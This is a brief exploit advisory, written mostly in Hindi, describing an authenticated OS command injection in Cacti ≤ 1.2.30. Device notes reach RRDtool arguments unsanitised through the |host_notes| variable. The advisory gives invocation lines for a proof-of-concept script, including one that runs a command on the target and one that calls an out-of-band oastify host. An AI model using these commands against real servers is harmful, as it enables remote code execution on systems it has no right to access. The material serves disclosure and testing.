
Cacti ≤ 1.2.30 Auth RCE - Host variable injection
Cacti ≤ 1.2.30 में एक OS कमांड इंजेक्शन भेद्यता किसी भी प्रमाणित उपयोगकर्ता को, जिसके पास डिवाइस और ग्राफ टेम्पलेट निर्माण विशेषाधिकार हैं, अंतर्निहित सर्वर पर मनमाने कमांड चलाने की अनुमति देती है। यह दोष मौजूद है क्योंकि उपयोगकर्ता-नियंत्रित होस्ट मेटाडेटा फ़ील्ड (विशेष रूप से डिवाइस नोट्स फ़ील्ड) को Cacti के वेरिएबल रिप्लेसमेंट इंजन के माध्यम से बिना किसी सैनिटाइजेशन या एस्केपिंग के RRDtool कमांड-लाइन तर्कों में प्रतिस्थापित किया जाता है। एक हमलावर नोट्स फ़ील्ड में शेल मेटाकैरेक्टर्स इंजेक्ट कर सकता है, एक ग्राफ टेम्पलेट बना सकता है जो |host_notes| वेरिएबल को संदर्भित करता है, और ग्राफ रेंडरिंग को ट्रिगर करके वेब सर्वर उपयोगकर्ता के रूप में पूर्ण दूरस्थ कोड निष्पादन प्राप्त कर सकता है।
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --cmd 'id'
OOB कमांड निष्पादन:
python3 cacti_rce_poc.py --url http://target/cacti --user admin --pass admin --oob your.oastify.com
